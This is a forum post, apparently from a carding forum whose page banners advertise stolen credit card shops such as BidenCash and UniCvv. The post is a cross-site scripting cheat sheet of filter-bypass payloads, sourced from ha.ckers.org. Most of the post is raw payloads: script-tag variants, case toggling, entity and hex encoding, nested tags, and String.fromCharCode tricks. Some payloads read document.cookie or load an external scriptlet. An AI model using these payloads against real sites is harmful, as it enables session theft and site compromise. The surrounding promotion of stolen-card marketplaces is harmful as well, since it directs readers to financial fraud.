Welcome!

By registering with us, you'll be able to discuss, share and private message with other members of our community.

SignUp Now!
Money Club cc shop
Savastan0
adv ex on 22 February 2024
DarkHIve
Patrick Stash
Blackstash cc shop
Trump cc shop
Wizard's shop 2.0
Luki Crown
Kfc Club
banner Expire 10 May 2025
banner expire at 13 August 2024
adv exp at 10 October
BidenCash Shop
adv ex on 22 February 2024
banner Expire 25 April 2025
Yale lodge shop
UniCvv

Complete Cross site Scripting(XSS) cheat sheets : Part 1

Premiums

Premiums

TRUSTED VENDOR
Joined
Dec 5, 2020
Messages
3,049
We are producing this XSS Cheat sheet after collecting the codes from hackers’ techniques and different sites especially http://ha.ckers.org/xss.html . This is complete list of XSS cheat codes which will help you to test xss vulnerabilities ,useful for bypassing the filters. If you have any different cheat codes , please send your code.


Basic XSS codes:
———————————-

<script>alert(“XSS”)</script>
Click to expand...


<script>alert(“XSS”);</script>
Click to expand...


<script>alert(‘XSS’)</script>
Click to expand...


“><script>alert(“XSS”)</script>
Click to expand...


<script>alert(/XSS”)</script>
Click to expand...


<script>alert(/XSS/)</script>
Click to expand...
When inside Script tag:
———————————

</script><script>alert(1)</script>
‘; alert(1);
‘)alert(1);//
Click to expand...
Bypassing with toggle case:
————————————–

<ScRiPt>alert(1)</sCriPt>
<IMG SRC=jAVasCrIPt:alert(‘XSS’)>
Click to expand...
XSS in Image and HTML tags:
———————————————

<IMG SRC=”javascript:alert(‘XSS’);”>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=javascript:alert(‘XSS’)>
Click to expand...


<img src=xss onerror=alert(1)>
<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=”jav ascript:alert(‘XSS’);”>
Click to expand...


<IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”>
Click to expand...


<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
Click to expand...


<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
Click to expand...


<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
Click to expand...


<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
Click to expand...


<BODY ONLOAD=alert(‘XSS’)>
<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>
<IMG SRC=”javascript:alert(‘XSS’)”
Click to expand...


<iframe src=http://ha.ckers.org/scriptlet.html <
Click to expand...
Bypass the script tag filtering:
————————————————–

<<SCRIPT>alert(“XSS”);//<</SCRIPT>
Click to expand...


%253cscript%253ealert(1)%253c/script%253e
Click to expand...


“><s”%2b”cript>alert(document.cookie)</script>
Click to expand...


foo<script>alert(1)</script>
Click to expand...


<scr<script>ipt>alert(1)</scr</script>ipt>
Click to expand...
Using String.fromCharCode function:
—————————————————–

<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
Click to expand...


‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Click to expand...
You can combine the above mentioned codes and make your own cheat code.

Note:
We are extending the cheat sheet. Soon we will publish the part 2.
 
You must log in or register to reply here.

Online statistics

Members online
529
Guests online
1,007
Total visitors
1,536
Totals may include hidden visitors.

Latest posts

Newest members

Stay Connected

Top Bottom